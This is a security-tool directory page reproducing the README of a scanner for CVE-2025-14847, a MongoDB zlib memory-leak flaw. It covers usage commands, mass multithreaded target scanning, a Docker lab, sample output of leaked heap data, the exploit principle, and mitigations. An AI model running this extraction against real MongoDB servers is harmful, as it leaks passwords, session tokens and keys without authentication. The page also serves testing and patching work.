Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-14847 — Herramienta de detección de la vulnerabilidad de fuga de memoria en MongoDB (CVE-2025-14847) | Kitploit
Herramientas/GitHubGitHub/onewinner/cve-2025-14847
Escáneres de VulnerabilidadesForensia de MemoriaExplotaciónRecopilación de InformaciónPruebas de PenetraciónSeguridad de Bases de Datos
GitHubonewinner/cve-2025-14847

CVE-2025-14847

Herramienta de detección de la vulnerabilidad de fuga de memoria en MongoDB (CVE-2025-14847)

Ver Repositorio
142hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

MongoDB CVE-2025-14847 漏洞检测工具

MongoDB 内存泄露漏洞 (CVE-2025-14847) 检测工具


⚠️ 重要提示:此工具仅用于授权的安全测试和漏洞评估。未经授权的使用可能违反法律。


📋 目录

  • Descripción de la vulnerabilidad
  • Características
  • Instalación
  • Uso
  • Configuración del entorno de pruebas
  • Ejemplos de salida
  • Principio de detección
  • Recomendaciones de mitigación
  • Descargo de responsabilidad

🔍 Descripción de la vulnerabilidad

CVE-2025-14847 es una vulnerabilidad crítica de fuga de memoria en el manejo del protocolo de compresión Zlib de MongoDB. Un atacante puede enviar paquetes comprimidos especialmente diseñados para provocar que MongoDB devuelva datos no inicializados de la memoria heap, que pueden contener información confidencial.

Versiones afectadas

Rango de versionesEstado
8.2.0 - 8.2.2⚠️ Afectada
8.0.0 - 8.0.16⚠️ Afectada
7.0.0 - 7.0.27⚠️ Afectada
6.0.0 - 6.0.26⚠️ Afectada
5.0.0 - 5.0.31⚠️ Afectada
4.4.0 - 4.4.29⚠️ Afectada
4.2.x todas las versiones⚠️ Afectada
4.0.x todas las versiones⚠️ Afectada
3.6.x todas las versiones⚠️ Afectada

Impacto de la vulnerabilidad

  • 🔴 Gravedad: CVSS 8.7 (Alta)
  • 💾 Filtra datos confidenciales de la memoria heap
  • 🔑 Puede contener contraseñas, tokens de sesión, claves de cifrado, etc.
  • 🚫 Explotable sin autenticación
  • 🌐 Explotable de forma remota

✨ Características

  • ✅ Detección inteligente: identifica automáticamente la versión de MongoDB y determina si está afectada
  • ✅ Doble verificación: detección de versión → detección de soporte Zlib → extracción de fugas de memoria
  • ✅ Escaneo de objetivo único: detección rápida de una instancia MongoDB individual
  • ✅ Escaneo por lotes: lee una lista de objetivos desde un archivo para detección masiva
  • ✅ Escaneo concurrente: admite concurrencia multi-hilo para mejorar la eficiencia del escaneo
  • ✅ Salida en tiempo real: muestra los datos de memoria filtrados en tiempo real
  • ✅ Exportación de resultados: guarda automáticamente los objetivos vulnerables en un archivo
  • ✅ Salida concisa: formato de salida unificado, claro y legible

🚀 Instalación

Método 1: Compilar desde el código fuente

root@kitploit:~
# 克隆仓库
git clone https://github.com/onewinner/CVE-2025-14847.git
cd CVE-2025-14847

# 安装依赖
go mod download

# 编译
go build -o mongodb-scanner main.go

# 运行
./mongodb-scanner -t 127.0.0.1:27017

Método 2: Ejecutar directamente

root@kitploit:~
go run main.go -t 127.0.0.1:27017

Método 3: Descargar la versión precompilada

Visite la página de Releases para descargar la versión precompilada adecuada para su sistema.

📖 Uso

Uso básico

root@kitploit:~
# 扫描单个目标
./mongodb-scanner -t 127.0.0.1:27017

# 从文件批量扫描
./mongodb-scanner -f targets.txt

# 批量扫描(20线程)
./mongodb-scanner -f targets.txt -c 20

# 扫描并保存存在漏洞的目标
./mongodb-scanner -f targets.txt -o vulnerable.txt

# 自定义偏移范围(更快速或更深度扫描)
./mongodb-scanner -t 127.0.0.1:27017 --min-offset 20 --max-offset 1000

Parámetros de línea de comandos

Formato del archivo de objetivos

Cree un archivo targets.txt:

root@kitploit:~
# MongoDB 目标列表
127.0.0.1:27017
192.168.1.100:27017
mongodb.example.com:27017

# 如果不指定端口,默认使用 27017
192.168.1.101

🐳 Configuración del entorno de pruebas

Para probar esta herramienta de forma segura, se recomienda utilizar Docker para configurar un entorno de pruebas local.

Inicio rápido de MongoDB afectado por la vulnerabilidad

root@kitploit:~
# 启动 MongoDB 6.0.14 (受漏洞影响的版本) 并开启 Zlib 压缩
docker run -d \
  --name mongodb-vulnerable \
  -p 27017:27017 \
  mongo:6.0.14 \
  --networkMessageCompressors snappy,zlib

# 查看容器状态
docker ps

# 测试漏洞
./mongodb-scanner -t 127.0.0.1:27017

Uso de Docker Compose

Cree un archivo docker-compose.yml:

root@kitploit:~
version: '3.8'

services:
  # 受漏洞影响的版本(开启 Zlib)
  mongodb-vulnerable:
    image: mongo:6.0.14
    container_name: mongodb-vulnerable
    ports:
      - "27017:27017"
    command: mongod --networkMessageCompressors snappy,zlib

  # 已修复的版本(用于对比测试)
  mongodb-patched:
    image: mongo:6.0.27
    container_name: mongodb-patched
    ports:
      - "27018:27017"
    command: mongod --networkMessageCompressors snappy,zlib

volumes:
  mongodb-data:
  mongodb-patched-data:

Inicie el entorno de pruebas:

root@kitploit:~
# 启动所有容器
docker-compose up -d

# 测试受漏洞影响的版本
./mongodb-scanner -t 127.0.0.1:27017

# 测试已修复的版本
./mongodb-scanner -t 127.0.0.1:27018

# 停止并清理
docker-compose down -v

Limpieza del entorno de pruebas

root@kitploit:~
# 停止并删除容器
docker stop mongodb-vulnerable && docker rm mongodb-vulnerable

# 清理数据卷
docker volume prune -f

📊 Ejemplos de salida

Descripción del formato de salida

La herramienta utiliza prefijos unificados para marcar la información de salida:

  • [*] - Salida de información (objetivo, versión, configuración, etc.)
  • [+] - Éxito/vulnerable/datos extraídos
  • [-] - Error/seguro/no vulnerable
  • [!] - Advertencia/aviso importante

Escaneo de un solo objetivo: vulnerable

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  MongoDB CVE-2025-14847 漏洞检测工具                         ║
╚══════════════════════════════════════════════════════════════╝
⚠️  仅用于授权安全测试 | 未经授权测试可能违法

[*] 目标: 1 | 线程: 10 | 超时: 2s | 偏移: 20-1000
[*] 开始扫描...

[*] 目标: 127.0.0.1:27017
[*] 版本: 6.0.14
[+] 漏洞版本: 是
[+] Zlib压缩: 已开启
[!] 漏洞可利用,开始提取内存...
[+] 偏移=229 长度=250: :00\"},\"s\":\"I\",  \"c\":\"NETWORK\",  \"id\":22944,   \"ctx\":\"conn102932\",

[+] 127.0.0.1:27017 - 漏洞可利用 (v6.0.14) - 3468ms
[+] 成功提取 1 项内存数据:
    [1] :00\"},\"s\":\"I\",  \"c\":\"NETWORK\",  \"id\":22944,   \"ctx\":\"conn102932\",\"msg\":\"Connection ended\",\"attr\":{\"remote\":\"172.17.0.1:44936\"...

======================================================================
[*] 扫描完成 | 总数: 1 | 可利用: 1 | 安全: 0 | 耗时: 3.4s
======================================================================

Escaneo de un solo objetivo: versión segura

root@kitploit:~
[*] 目标: 127.0.0.1:27018
[*] 版本: 6.0.27
[-] 漏洞版本: 否

[-] 127.0.0.1:27018 - 版本安全 (v6.0.27) - 156ms

======================================================================
[*] 扫描完成 | 总数: 1 | 可利用: 0 | 安全: 1 | 耗时: 0.2s
======================================================================

Escaneo de un solo objetivo: Zlib no habilitado

root@kitploit:~
[*] 目标: 127.0.0.1:27017
[*] 版本: 6.0.14
[+] 漏洞版本: 是
[-] Zlib压缩: 未开启

[-] 127.0.0.1:27017 - 未开启Zlib (v6.0.14) - 234ms

======================================================================
[*] 扫描完成 | 总数: 1 | 可利用: 0 | 安全: 1 | 耗时: 0.3s
======================================================================

Escaneo por lotes

root@kitploit:~
[*] 目标: 5 | 线程: 10 | 超时: 2s | 偏移: 20-8192
[*] 开始扫描...

[+] 192.168.1.10:27017 - 漏洞可利用 (v6.0.14) - 3521ms
[+] 成功提取 2 项内存数据:
    [1] Connection ended...
    [2] network statistics...

[-] 192.168.1.11:27017 - 版本安全 (v6.0.27) - 145ms
[-] 192.168.1.12:27017 - 未开启Zlib (v6.0.14) - 198ms
[+] 192.168.1.13:27017 - 漏洞可利用 (v7.0.15) - 2987ms
[!] 192.168.1.14:27017 - 漏洞可利用但未提取到数据 (v6.0.20) - 4123ms

======================================================================
[*] 扫描完成 | 总数: 5 | 可利用: 3 | 安全: 2 | 耗时: 5.2s
======================================================================

[+] 可利用的目标已保存到: vulnerable.txt

🔬 Principio de detección

Esta herramienta emplea un mecanismo de detección en tres pasos:

1️⃣ Detección de versión

  • Conecta a la instancia de MongoDB
  • Obtiene la información de versión (comando buildInfo)
  • Determina si la versión está dentro del rango afectado por la vulnerabilidad

2️⃣ Detección de soporte de compresión Zlib

  • Envía un paquete de prueba de compresión Zlib
  • Comprueba si el servidor devuelve una respuesta comprimida
  • Confirma si la compresión Zlib está habilitada

3️⃣ Extracción de fugas de memoria

  • Envía paquetes comprimidos especialmente diseñados
    • Declara un tamaño tras la descompresión mucho mayor que el real
    • Hace que el servidor lea memoria heap no inicializada
  • Escanea múltiples desplazamientos para extraer más datos
  • Descomprime la respuesta del servidor y extrae los nombres de campos filtrados
  • Muestra en tiempo real los datos de memoria encontrados

Lógica de evaluación

CondiciónResultado
Versión vulnerable + Zlib habilitado + datos extraídos✅ Vulnerabilidad explotable: muestra los datos filtrados
Versión vulnerable + Zlib habilitado + sin datos extraídos⚠️ Vulnerabilidad explotable pero sin datos extraídos
Versión vulnerable + Zlib no habilitado❌ Zlib no habilitado: no explotable

🛠️ Recomendaciones de mitigación

Solución de reparación urgente

Actualice inmediatamente a una de las siguientes versiones corregidas:

  • MongoDB Server 8.2.3
  • MongoDB Server 8.0.17
  • MongoDB Server 7.0.28
  • MongoDB Server 6.0.27
  • MongoDB Server 5.0.32
  • MongoDB Server 4.4.30

Medidas de mitigación temporales

Si no es posible actualizar a corto plazo, se pueden adoptar las siguientes medidas temporales:

1. Deshabilitar la compresión Zlib

Configure en mongod.conf o mongos.conf:

root@kitploit:~
net:
  compression:
    compressors: []

O excluya explícitamente zlib en los parámetros de inicio:

root@kitploit:~
mongod --networkMessageCompressors snappy,zstd

2. Usar otro algoritmo de compresión

Se recomienda usar snappy o zstd en lugar de zlib:

root@kitploit:~
net:
  compression:
    compressors: snappy,zstd

3. Control de acceso a la red

  • Restrinja el puerto de MongoDB solo a IPs de confianza
  • Use reglas de firewall o la configuración bindIp
  • Habilite la transmisión cifrada TLS/SSL

4. Habilitar control de acceso

  • Habilite el mecanismo de autenticación (parámetro --auth)
  • Use políticas de contraseñas seguras
  • Implemente el principio de privilegio mínimo

5. Supervisión y auditoría

  • Supervise conexiones anómalas y patrones de acceso a memoria
  • Habilite el registro de auditoría
  • Revise periódicamente los registros de seguridad

⚠️ Aviso importante: las medidas de mitigación temporales solo reducen el riesgo, no son una solución definitiva. Se recomienda encarecidamente actualizar a una versión corregida lo antes posible.

⚠️ Descargo de responsabilidad

Aviso importante:

  • ✅ Esta herramienta está destinada únicamente a pruebas de seguridad autorizadas y evaluaciones de vulnerabilidad
  • ✅ Antes de usar esta herramienta, asegúrese de tener permiso para probar el sistema de destino
  • ❌ Los escaneos no autorizados pueden violar leyes y regulaciones
  • ❌ El autor no se hace responsable de ningún uso indebido

Al usar esta herramienta, usted acepta:

  1. Usarla únicamente en sistemas con autorización explícita
  2. Cumplir con las leyes y regulaciones de su jurisdicción
  3. Ser responsable de cualquier consecuencia derivada del uso de esta herramienta

📄 Licencia

Este proyecto está bajo la licencia de código abierto MIT License.

🤝 Contribuciones

¡Bienvenidos los Issues y Pull Requests!

Guía de contribución

  1. Haga un fork de este repositorio
  2. Cree su rama de funcionalidad (git checkout -b feature/AmazingFeature)
  3. Realice sus cambios (git commit -m 'Add some AmazingFeature')
  4. Envíe a la rama (git push origin feature/AmazingFeature)
  5. Abra un Pull Request

📚 Referencias

  • Detalles de CVE-2025-14847
  • Aviso de seguridad de MongoDB
  • Guía de actualización de MongoDB
  • Configuración de compresión de MongoDB

👨‍💻 Autor

onewinner - @onewinner

Dirección del proyecto: https://github.com/onewinner/CVE-2025-14847

📝 Registro de cambios

v1.0.0 (2025-12-26)

  • 🎉 Lanzamiento de la versión inicial
  • ✅ Soporte para escaneo de objetivo único y por lotes
  • ✅ Soporte para escaneo concurrente multi-hilo
  • ✅ Detección automática de versión y evaluación de riesgos
  • ✅ Detección inteligente de fugas de memoria
  • ✅ Recomendaciones detalladas de mitigación

⭐ Si este proyecto le resulta útil, ¡dé una estrella!

Made with ❤️ by Security Researchers

Descargar herramienta
ParámetroDescripciónValor predeterminado
-t <target>Objetivo único (p. ej., 127.0.0.1:27017)-
-f <file>Archivo de objetivos (un objetivo por línea)-
-c <num>Número de hilos concurrentes10
-timeout <time>Tiempo de espera de conexión2s
-o <file>Archivo de salida (guarda objetivos vulnerables)-
--min-offset <num>Desplazamiento mínimo de longitud de documento20
--max-offset <num>Desplazamiento máximo de longitud de documento8192
Versión no vulnerable✅ Versión segura